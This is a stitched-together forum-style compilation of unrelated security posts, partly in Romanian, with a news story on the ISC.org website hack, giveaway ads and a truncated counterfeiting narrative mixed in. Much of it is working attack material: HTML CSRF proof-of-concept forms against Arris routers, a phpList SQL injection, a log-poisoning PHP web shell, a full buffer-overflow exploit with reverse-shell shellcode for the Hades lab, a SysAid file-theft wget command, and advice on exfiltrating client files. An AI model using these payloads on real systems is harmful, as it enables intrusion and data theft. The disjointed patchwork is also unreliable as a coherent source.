Aerosol

The website for the Internet Systems Consortium, which develops the BIND DNS and ISC DHCP tools, has been hacked. Anyone who recently browsed ISC.org is urged to check their PC for malware as miscreants booby-trapped the site to infect visitors. The website has been replaced by a placeholder page warning netizens of the attack. ISC.org served pages using WordPress, and either that CMS or one of its plugins or support files was exploited to compromise the web server, it seems. We're told the source code to ISC's crucial software packages are stored on a separate server, and cryptographically signed to prove they haven't been tampered with. Its BIND DNS server and DHCP tools are widely used on the internet, and included in most Linux and Unix-flavored operating systems. "It was just the website – and it doesn't even look like we were targeted specifically," said Dan Mahoney of the ISC Security Officer team to The Register via email on Friday. "It looks like this was just one of those exploits that happens to CMSes of this nature." You can forgive people for being slightly jumpy about an ISC.org compromise: its software glues the internet together, and the organization runs the world's F root servers [PDF] which are at the heart of the 'net's global address book of domain names. People visiting the .org are likely to be involved in engineering software and hardware behind the scenes of the web; compromising them with malware could give attackers access to valuable systems and possibly the tools to subvert them. Mahoney told us that the F-root servers' "service and security is absolutely unaffected" by ISC.org's compromise. In November, ICANN – another crucial internet body – was compromised in a spear-phishing attack, but it appears there's no connection between that infiltration and the ISC.org attack. According to a blog post by Cyphort Labs, ISC was warned its website was serving malware on December 22; the site was scrubbed clean and replaced by a placeholder the next day. Miscreants had managed to exploit some part of the CMS to redirect visitors to a page serving the Angler Exploit Kit. This package attempts to infect Windows PCs using security holes in Internet Explorer, Flash and Silverlight. If it achieves remote-code execution, the malware downloads more data, decrypts it into DLL files, and runs them in memory without touching a disk. The software nasty supports 32-bit and 64-bit Windows; the code's final purpose isn't clear but we assume it's bad news for the victim. "We're working with some security researchers to determine the state of the damage and what our next steps are, and are rebuilding with a clean database and CMS, which has unfortunate timing with regard to people's travel and vacations, which is why the placeholder page has been up longer than we'd like," Mahoney added. "All our releases remain cryptographically signed, and checksummed, and are distributed via ftp.isc.org, which is a completely different system and houses no dynamic content." Source

Need a site opened at a certain time? What about a program you need up and running; open file; or close a program at a certain time? TimeBell does it for you, automatically! TimeBell automates reminders and many repetitive computer actions. Once a task is created in TimeBell, you will never have to worry about it again. There is even a convenient desktop calendar. Sale ends in 17 hrs 19 mins Free TimeBell (100% discount)

GoogleClean 2014 aims to protect your personal data and web surfing habits from curious corporate big brother, aka Google; IDs are made anonymous, personal information is deleted, and spy/tracking cookies are under control. Check it out now. This giveaway has no free updates or tech support and is for home/personal use only. Get GoogleClean 2015 with free updates for free updates, free tech support, business + home use, and ability to install/reinstall whenever you want. Sale ends in 17 hrs 19 mins Link: Free GoogleClean 2014 (100% discount)

Salut si bine ai venit!

Eu ca distributie de zi cu zi Kali ( am dual-boot Windows 7 cu Kali linux )

IceWeasel cel mai tare browser

----------- Vendor: ----------- Arris Interactive, LLC (http://www.arrisi.com/) ISP: Comcast Xfinity ----------------------------------------- Affected Products/Versions: ----------------------------------------- HW: Arris Touchstone TG862G/CT (Xfinity branded) SW: Version 7.6.59S.CT (Tested) ----------------- Description: ----------------- Title: Cross-site Request Forgery (CSRF) CVE: CVE-2014-5437 CWE: CWE-352: http://cwe.mitre.org/data/definitions/352.html Researcher: Seth Art - @ Sethsec ---------------------------------------------------- POC - Enable remote management: ---------------------------------------------------- <html> <body> <h1>Arris </h1> <form action="http://10.0.0.1/remote_management.php"; method="POST"> <input type="hidden" name="http_port" value="8080" /> <input type="hidden" name="http" value="enabled" /> <input type="hidden" name="single" value="any" /> <input type="submit" value="Submit request" /> </form> Sending CSRF Payload!!! </body> </html> ---------------------------------------------- POC - Add port forwarding rule: ---------------------------------------------- <html> <body> <h1> Arris TG862G/CT – CSRF - Add port forwarding rule</h1> <form action="http://10.0.0.1/port_forwarding_add.php"; method="POST"> <input type="hidden" name="common_services" value="other" /> <input type="hidden" name="other_service" value="csrf1" /> <input type="hidden" name="sevice_type" value="1" /> <input type="hidden" name="server_ip_address_1" value="10" /> <input type="hidden" name="server_ip_address_2" value="0" /> <input type="hidden" name="server_ip_address_3" value="0" /> <input type="hidden" name="server_ip_address_4" value="100" /> <input type="hidden" name="start_port" value="3389" /> <input type="hidden" name="end_port" value="3389" /> <input type="submit" value="Submit request" /> </form> Sending CSRF Payload!!! </body> ----------------------------------------------------------- POC - Change wireless network to open: ----------------------------------------------------------- <html> <body> <h1> Arris TG862G/CT – CSRF – Change wireless network to open</h1> <form action="http://10.0.0.1/wireless_network_configuration_edit.php"; method="POST"> <input type="hidden" name="restore_factory_settings" value="false" /> <input type="hidden" name="channel_sel" value="Manual" /> <input type="hidden" name="channel_num" value="1" /> <input type="hidden" name="ssid" value="csrf" /> <input type="hidden" name="wifi_mode" value="7" /> <input type="hidden" name="security" value="none" /> <input type="hidden" name="channel_selection" value="manual" /> <input type="hidden" name="channel" value="1" /> <input type="hidden" name="save_settings" value="Save Settings" /> </form> Sending CSRF Payload!!! </body> </html> ----------------------------------------------------- POC - Login with default credentials: ----------------------------------------------------- <html> <body> <h1>Arris TG862G/CT - Login CSRF – Default credentials </h1> <form action="http://10.0.0.1/home_loggedout.php"; method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="password" /> <input type="submit" value="Submit request" /> </form> Sending CSRF Payload!!! </body> </html> ------------- Solution: ------------- I tested my Comcast Xfinity device on December 10th, 2014 and it is no longer vulnerable (version 7.6.86L.CT). If you have an Arris modem/router, contact your ISP (or Arris) to verify that your firmware has been updated to address this vulnerability... or you could fire up Burp and see for yourself ----------------------------- Disclosure Timeline: ----------------------------- 2014-07-16: Notified Arris of vulnerabilities in TG862G/CT product 2014-07-16: Arris responded and escalated issue to Tier 2 2014-07-17: Arris requested vulnerability details 2014-07-17: Vulnerability report sent to Arris Tier 2 2014-07-18: Arris confirmed receipt and began investigation 2014-08-04: Requested update from Arris 2014-08-05: Arris confirms issue has been escalated to engineering team 2014-08-06: Attended call with Arris to walk through findings 2014-09-18: Notified Arris that CVE-2014-5437 will be used to identify this vulnerability 2014-09-25: December 6th suggested as the disclosure date 2014-10-13: Arris requested disclosure date of December 15th 2014-12-15: Public disclosure _______________________________________________ Sent through the Full Disclosure mailing list [url]http://nmap.org/mailman/listinfo/fulldisclosure[/url] Web Archives & RSS: [url]http://seclists.org/fulldisclosure/[/url] Source

Document Title: =============== PHPLIST v3.0.6 & v3.0.10 - SQL Injection Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1358 Release Date: ============= 2014-12-18 Vulnerability Laboratory ID (VL-ID): ==================================== 1358 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== phpList is an open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news, advertising to list of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source software subject to the terms of the GNU General Public License (GPL). Most popular open source newsletter manager. Easy permission marketing. Free to download, easy to install and integrate, Versatile and extensible. Over 10,000 downloads a month. (Copy of the Vendor Homepage: https://www.phplist.com/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official PHPList v3.0.6 & v3.0.10 web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== PHPList Limited Product: PHPList - Web Application 3.0.6 - 3.0.10 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A sql injection web vulnerability has been discovered in the official PHPLIST v3.0.6 & v3.0.10 open source web-application. The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms. The sql injection vulnerability is located in the abo user search engine of the phplist application. Local privileged accounts are able to inject own sql commands by usage of vulnerable findby value in the abo user search module. A successful attack requires to manipulate a GET method request with vulnerable findby value. The injection is a basic order by sql injection that allows to compromise the web-application. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the application-side web vulnerability requires a low privileged web-application user account and no user interaction. Successful exploitation of the security vulnerability result in web-application and database management system compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] Abonnenten suchen > Abonnenten finden > Abonnenten finden Vulnerable Parameter(s): [+] findby Proof of Concept (PoC): ======================= The sql injection web vulnerability can be exploited by remote attackers with privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Abonnenten suchen > Abonnenten finden > Abonnenten finden http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=-1'[SQL INJECTION VULNERABILITY!]-- --- SQL Error Session Logs --- Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '' at line 1 Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1 - Database error 1054 while doing query Unknown column '10' in 'order clause' Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Database error 1064 while doing query You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1 Reference(s): http://phplist.127.0.0.1:8080/lists/ http://phplist.127.0.0.1:8080/lists/admin/ http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0 http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=1 Solution - Fix & Patch: ======================= The vulnerability can be patched by a restriction of the findby parameter in the abo user search module. Encode and parse the input values to prevent sql injection attacks. Use a prepared statement to secure the point were the app communicates with the local dbms. Disallow that php code errors becomes visible - error(0). Security Risk: ============== The security risk of the sql injection web vulnerability in the findby value of the abo user search module is estimated as high. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Source

wget – command line tool to retrieve files via HTTP, HTTPS and FTP http://downloads.hackerforhire.com.au/wget.exe netcat – command line tool for reading/writing to network connections using TCP/UDP wget http://downloads.hackerforhire.com.au/nc.exe putty – telnet/SSH client wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe plink – command line version of putty telnet/SSH client wget http://the.earth.li/~sgtatham/putty/latest/x86/plink.exe psexec – command line tool to execute remote processes wget http://downloads.hackerforhire.com.au/psexec.exe psfile – command line tool to to show remotely opened files wget http://downloads.hackerforhire.com.au/psfile.exe psgetsid – displays the SID of a user or computer wget http://downloads.hackerforhire.com.au/psgetsid.exe psinfo – displays information about the system wget http://downloads.hackerforhire.com.au/psinfo.exe pskill – kill processes by name or PID wget http://downloads.hackerforhire.com.au/pskill.exe psloggedon – see whos logged on locally via resource sharing wget http://downloads.hackerforhire.com.au/psloggedon.exe psloglist – dump the event viewer records wget http://downloads.hackerforhire.com.au/psloglist.exe pspasswd – changes account passwords wget http://downloads.hackerforhire.com.au/pspasswd.exe psping – alternative to network ping wget http://downloads.hackerforhire.com.au/psping.exe psservice – displays and controls services wget http://downloads.hackerforhire.com.au/psservice.exe psshutdown – shutdown or reboot the computer wget http://downloads.hackerforhire.com.au/psshutdown.exe pssuspend – suspend and resume services wget http://downloads.hackerforhire.com.au/pssuspend.exe Source

Este destul de vechi aceste videoclip dar este interesant si merita urmarit!

So we have our Local File Inclusion vulnerability and we can read the “/etc/passwd” file, now it’s time to start escalating the attack so that we are able to execute our own commands on the target system. In the previous post, we found the Apache log files and particularly the Apache “error.log” file using Burp Suite’s Intruder module. We are now going to use this log file to inject our own PHP code into this page. If we tried to access “http://www.example.com/askjdhaksghfkgf” we should get an Error 404 telling us the the page was not found. Additionally, this should also echo our invalid request into the “error.log” file and we can now clearly see that by requesting anything that generates and error we have the ability to influence the contents of the “error.log” file. Seeing as we’re using this as part of an LFI vulnerability, we are also dynamically writing code into the page we are viewing. If the site is running PHP, then we can therefore create our own PHP functions just by requesting a page that does not exist. Take the following PHP example: <!--?php system($_GET['cmd']); ?--> If we wrote the same piece of code inline it would look like this: <!--?php system($_GET['cmd']); ?--> And if we went one step further and URL encoded it, it should look like this: %3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E Now we append this to the URL and make the following request: http://www.example.com/askjdhaksghfkgf%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E This gives us another 404 error message although this time it has also re-written our PHP code into the Apache “error.log” file as part of our invalid request. When Apache reads this code back, it see’s the PHP code and processes it as a legitimate PHP script when we access this vulnerable page. At first, nothing may seem out of sort except for the two invalid requests although you can see that it is now looking for a “cmd” parameter which we have not provided as yet. Is we now append the cmd parameter as “%00&cmd=ls” to the end of the URL, we see the output of our “ls” command where we injected our own PHP code. Source

aveti aici un link spre contul de youtube. https://www.youtube.com/user/HackersOnBoard/videos Foarte multe videoclipuri interesante!

About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out of the box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS! Big thanks go out to the Vulnhub team for the awesome work they do. Follow them on Twitter to keep up with the latest releases. If you want to tackle Hades yourself, you can grab a copy of the machine here. Enjoy Commands Used # Host Discoverynetdiscover -r 10.0.0.0/24 # Service Enumerationnmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129 # Base64 Decryptionbase64 -d ssh-hades > hades.bin # Pattern Creation/opt/metasploit-framework/tools/pattern_create 1000 # Offset Search/opt/metasploit-framework/tools/pattern_offset.rb Af7A/opt/metasploit-framework/tools/pattern_offset.rb 5Af6/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133 # Finding Assembly Shellcode/opt/metasploit-framework/tools/metasm_shell.rbmetasm> jmp $esp+80 # Reverse Shell Payloadmsfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python # Improved Shellpython -c "import pty; pty.spawn('/bin/sh')" # File Decryptionopenssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_fileFinished Exploit – Hades#!/usr/bin/env python import socket, struct target = '10.0.0.129'port = 65535 # Shellcode# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1) buf = ""buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x 2b"buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x 20"buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x 34"buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\x b6"buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x 57"buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x 43"buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\x b6"buf += "\xf8\x78\x10\xb8" # Buffer#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2 Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae 9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5A g6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2 Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj 9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5A l6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2 An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao 9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5A q6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2 As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At 9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5A v6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2 Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay 9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5B a6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2 Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd 9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5B f6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2 B'buffer = '\x90'*11buffer += bufbuffer += '\x90'*(131-95-11)buffer += '\xeb\x4e\x90\x90' # esp - 0x2cbuffer += 'F'*(167-4-131)buffer += 'B'*4 # ebpbuffer += struct.pack("<L",0x08048694) # eipbuffer += 'D'*(1000-4-4-167) # Connect and send payloads = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((target, port))s.send(buffer)data = s.recv(1024)s.close()

Every now and then I come across some application that may or may not have been developed with penetration testing in mind but it ends up being damn helpful all the same. Yesterday I found a post about ‘srvdir‘ (surv~durr?) which is designed to share content over SSL/TLS via a public site. When trying to exfiltrate data from a client site I normally spend a lot of time setting up tunnels, using disposable A records from afraid.org and one of my boxes in some east-european cave just so I can get the damn ‘payroll-summary-june-2014.pdf’ trophy off some box that is swimming in ssh-tunnel-fu. srvdir is the perfect answer to this problem and testing it has been awesome and full of those “Why didn’t I think of this?!!” rants. Essentially, what srvdir does is to create a SSL tunnel to the mothership ‘srvdir.net’ and issue a subdomain that can be accessed externally to siphon the files off. Grabbing files is relatively painless with the odd 404 for the permission snobs. It supports basic http-auth for the paranoid and by the looks of it, tokens as well. It runs seamlessly on Windows, Linux and OSX and is relatively small. To get the file, use wget: Windows wget.exe --no-check-certificate https://dl.srvdir.net/windows_386/srvdir.zip Mac OSX wget --no-check-certificate https://dl.srvdir.net/darwin_amd64/srvdir.zip Linux wget --no-check-certificate https://dl.srvdir.net/linux_386/srvdir.zip Unzip the file: unzip srvdir.zip Help ./srvdir -h Usage: ./srvdir [-auth="username:password"] subdomain:path Share current folder with custom subdomain ./srvdir norsec0de:. Source

Looking back, I can’t remember a time where I used Nmap to perform UDP port scans. Pentesters are far too impatient to spend hours waiting for a UDP scan to finish in the hope of finding some badly configured service. Which is why I found it odd when I received a message saying “why do UDP scans take hours?” img]http://i.imgur.com/o2oQR4a.png It never occurred to me that this poor dude was staring at the screen, Nmap torturing him every 30 seconds by telling him he won’t be done with this machine any time this week. I told him about this gem of a payload transmitter that just also happened to be an epic UDP port scanner, largely forgotten since the sad departure of the late Jack C. Louis. And seeing as this was a client supplied ‘jump-box’ and not something handy like Kali, I decided to take a crack at installing and showing the tester good ol’ unicornscan. (I didn’t realise installing unicornscan would take longer than the Nmap UDP scan itself) Many, MANY hours later I finally got unicornscan working and decided to make a note on how to deploy this on an updated debian distro circa 2014. Get the dependencies installed sudo apt-get install postgresql libdnet-dev libpq-dev libpcap-dev bison flex Download and Install unicornscan wget http://sourceforge.net/projects/osace/files/unicornscan/unicornscan%20-%200.4.7%20source/unicornscan-0.4.7-2.tar.bz2/download -O unicornscan-0.4.7-2.tar.bz2 tar jxvf unicornscan-0.4.7-2.tar.bz2 cd unicornscan-0.4.7/ ./configure CFLAGS=-D_GNU_SOURCE make sudo make install Source

This Guide is adapted from Carlos Perez’s Blog (Installing Metasploit Framework in OS X) (which is a must read) with some additions and fixes to make the setup work on OS X Yosemite. This post should help to alleviate some common issues with installing ruby and the Metasploit Framework on OS X. The main issues being that OS X ships with a newer version of Ruby that is not compatible with Metasploit and the version of libiconv installed with OS X causes issues installing the Nokogiri gem. Xcode and Command Line Development Tools The first step is to ensure that Software Update has been run and that OS X is updated. Once OS X has been updated, It is time to install Xcode. Mac App Store – Xcode Once Xcode has been installed launch Xcode from Applications and agree to the SDK License Agreement. Instal Xcode developer tools by typing: xcode-select --install Click Install in the dialog box that pops up and the package will be installed. Java Ensure that the latest versions of the Java 7 JRE and JDK are installed. http://download.oracle.com/otn-pub/java/jdk/8u25-b17/jdk-8u25-macosx-x64.dmg http://download.oracle.com/otn-pub/java/jdk/8u25-b17/jre-8u25-macosx-x64.dmg Homebrew Install homebrew by running the following command: ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" Once Homebrew installs, run ‘brew doctor’ to finalize the installation of homebrew. brew doctor Once homebrew is installed and set up, the PATH needs to be updated to ensure that all homebrew binaries are executed correctly. echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile Once this is done, load the new $PATH by sourcing it. source ~/.bash_profile From here we need to ensure that both versions and dupes are loaded into homebrew (We load in dupes for later, as a dependency for nokogiri is located in here.) brew tap homebrew/versions brew tap homebrew/dupes Homebrew Installs Before Metasploit can be installed, some more dependencies should be installed via homebrew. Nmap This can be installed either via the dmg from their site, or via homebrew. Homebrew tends to keep their packages updated and it is quite easy to install and manage. brew install nmap Install Ruby 1.9.3 Now time for the part the most frequently causes issues. Ruby 1.9.3. This is the version from homebrew that works best with Metasploit and is easiest to install and maintain. brew install homebrew/versions/ruby193 Now, the most important part of the ruby installation, Ensuring that the ruby version you are running is in fact 1.9.3. ruby –v Installing and configuring PostgreSQL Now, time to install the backend database that Metasploit uses. brew install postgresql --without-ossp-uuid If the Homebrew install did NOT complete this for you, the next step is to initialize the database for first time usage. initdb /usr/local/var/postgres As of 9.3.5_1 it looks like the homebrew installer wraps up by running this command for you. Ensure that postgreSQL is set to launch on boot by issuing the following: mkdir -p ~/Library/LaunchAgents cp /usr/local/Cellar/postgresql/9.3.5_1/homebrew.mxcl.postgresql.plist ~/Library/LaunchAgents/ Start the PostgreSQL service: launchctl load -w ~/Library/LaunchAgents/homebrew.mxcl.postgresql.plist Create a new user msf* and a database msf with the user msf as the owner. createuser msf -P -h localhost createdb -O msf msf -h localhost *Remember this password as it will be used when configuring Metasploit Configuring VNCViewer As Metasploit uses vncviewer for its VNC payloads, and OS X comes with a VNC client, we need to create the needed vncviewer file that will call the OS X vnc viewer. echo '#!/usr/bin/env bash'>> /usr/local/bin/vncviewer echo open vnc://\$1 >> /usr/local/bin/vncviewer chmod +x /usr/local/bin/vncviewer Installing Metasploit Framework Installing the following gems needed for running the framework: gem install pg sqlite3 msgpack activerecord redcarpet rspec simplecov yard bundler Download the framework and prepare the directories: cd /usr/local/share/ git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework for MSF in $(ls msf*); do ln -s /usr/local/share/metasploit-framework/$MSF /usr/local/bin/$MSF;done sudo chmod go+w /etc/profile sudo echo export MSF_DATABASE_CONFIG=/usr/local/share/metasploit-framework/config/database.yml >> /etc/profile Using brew and bundler the properly supported gems need to be installed. brew install libiconv gem install nokogiri –v ‘1.6.3.1’ -- --with-iconv-dir=/usr/local/Cellar/libiconv/1.14 bundle install Now that the framework has been installed, and proper bundles installed. The database connection needs to be configured. Save the following into /usr/local/share/metasploit-framework/config/database.yml replace <password> with the msf user’s password you set earlier. vi /usr/local/share/metasploit-framework/config/database.yml production: adapter: postgresql database: msf username: msf password: <password> host: 127.0.0.1 port: 5432 pool: 75 timeout: 5 Now that this file has been created, source bash_profile to load the variables for the database. source /etc/profile source ~/.bash_profile Now, to start Metasploit Framework as YOUR USER to it initializes the schema for the database for the first time as a NON ROOT user. msfconsole Once the console loads, ensure that the database is connected by issuing: msf> db_status it should return: [*] postgresql connected to msf Install Armitage Execute the following commands to prepare the environment and download armitage to the correct location: brew install pidof curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz tar -xvzf /tmp/armitage.tgz -C /usr/local/share bash -c "echo \'/usr/bin/java\' -jar /usr/local/share/armitage/armitage.jar \$\*" > /usr/local/share/armitage/armitage perl -pi -e 's/armitage.jar/\/usr\/local\/share\/armitage\/armitage.jar/g' /usr/local/share/armitage/teamserver Lastly, create sym links for Armitage: ln -s /usr/local/share/armitage/armitage /usr/local/bin/armitage ln -s /usr/local/armitage/teamserver /usr/local/bin/teamserver Now that the installing is complete, to launch these application I have created OS X .app files that will launch these from the Dock or /Applications/ (coming soon) However if you would like to use the terminal, due to the way variables are handled when using sudo, you will need to give the –E option. sudo –E armitage sudo –E msfconsole Special thanks to Syph0n for creating this article Source

Vantage Point Security Advisory 2014-004 ======================================== Title: SysAid Server Arbitrary File Disclosure ID: VP-2014-004 Vendor: SysAid Affected Product: SysAid On-Premise Affected Versions: < 14.4.2 Product Website: http://www.sysaid.com/product/sysaid Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg> Summary: --- SysAid Server is vulnerable to an unauthenticated file disclosure attack that allows an anonymous attacker to read arbitrary files on the system. An attacker exploiting this issue can compromise SysAid user accounts and gain access to important system files. When SysAid is configured to use LDAP authentication it is possible to gain read access to the entire Active Directory or obtain domain admin privileges. Details: --- How to download SysAid server database files containing usernames and password hashes (use any unauthenticated session ID): wget -O "ilient.mdf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \ "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf" wget -O "ilient.ldf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \ "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF" The dowloaded MSSQL files contain the LDAP user account and encrypted password used to access the Active Directory (SysAid encrypts the password with a static key that is the same for all instances of the software). Fix Information: --- Upgrade to version 14.4.2. Timeline: --- 2014/11/14: Issue reported 2014/12/22: Patch available and installed by client About Vantage Point Security: --- Vantage Point Security is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. Web: https://www.vantagepoint.sg/ Contact: office[at]vantagepoint[dot]sg Source

Bill Gates este cel mai influent om. De ce? Bill Gates - Wikipedia

On a bright May afternoon in 2007, a German artist and printmaker named Hans-Jürgen Kuhl took a seat at an outdoor café directly opposite the colossal facade of the Cologne Cathedral. He ordered an espresso and a slice of plum cake, lit a Lucky Strike, and watched for the buyer. She was due any minute. Kuhl, a lanky 65-year-old, had to remind himself that he was in no rush. He’d sold plenty of artwork over the years, but this batch was altogether different. He needed to be patient. Tourists milled about the platz in front of the cathedral, Germany’s most visited landmark, craning their necks to snap pictures of the impossibly intricate spires jutting toward the heavens. Kuhl knew those spires well. He had grown up in Cologne and painted the majestic cathedral countless times. On the other side of a low brick wall surrounding the café, Kuhl finally spotted her. Tall, blond, and trim, Susann Falkenthal looked about 30. As was the case during their previous meetings, she wore practical shoes, an unremarkable blouse and pair of pants, and little makeup. Kuhl thought her plain look was something of a contradiction for a businesswoman who drove a black BMW convertible, but no matter. When they first met a few months earlier, Falkenthal said she was an events manager from Vilnius, Lithuania, and gave Kuhl a card printed with a Vilnius address as well as an address from the German city of Essen. Her German was flawless. This appointment by the cathedral was perhaps their 10th, and they greeted each other with a kiss on each cheek. Over the past few months, they had been meeting at Kuhl’s studio. She brought cake; he made coffee. They discussed jazz, Kuhl’s years as a fashion designer, the time Kuhl had met Andy Warhol, vacation spots on the Spanish island of Majorca, and eventually counterfeit US dollars. IF KUHL COULDN’T SELL HIS BEAUTIFUL FAKE BILLS, THEY WOULD JUST END UP ROTTING IN A STORAGE LOCKER. Early on, Falkenthal said she did a lot of business with Russian contacts in Vilnius, where unscrupulous types would sometimes try to bribe bouncers with fake $100 bills to gain access to exclusive events organized by her firm. Kuhl sympathized and mentioned a couple of tricks for detecting forgeries. “It’s easy to see and feel if it’s fake or not,” he told her. A few weeks later, Falkenthal told Kuhl that she had a high-end party coming up in August. Would he be interested in printing the tickets for it? She wanted them to have unique serial numbers and some way to protect against forgeries. Kuhl suggested a strip that shines brightly when exposed to an ultraviolet lamp. Falkenthal told him the official order was for 300 tickets but then with a wink requested he print an extra 50 for her to sell on the side. She obviously isn’t the Pope, Kuhl thought. Working with her might get interesting. After Kuhl printed the tickets for Falkenthal—including the extra 50—and was paid, he decided to take his chances with her. Not in the romantic sense, although during some of Falkenthal’s visits to his studio, Kuhl certainly noticed the way she’d drape an arm on the back of his desk chair and lean over him to inspect print drafts on his monitor. He thought they could do business. There were risks, Kuhl knew, but he tended to trust people. So he showed her a counterfeit $100 bill that he had made. As a precaution, he told her the sample had come from someone in Poland. There may be many more, he added. She asked if she could borrow it to show to a Russian friend. He said sure but warned her 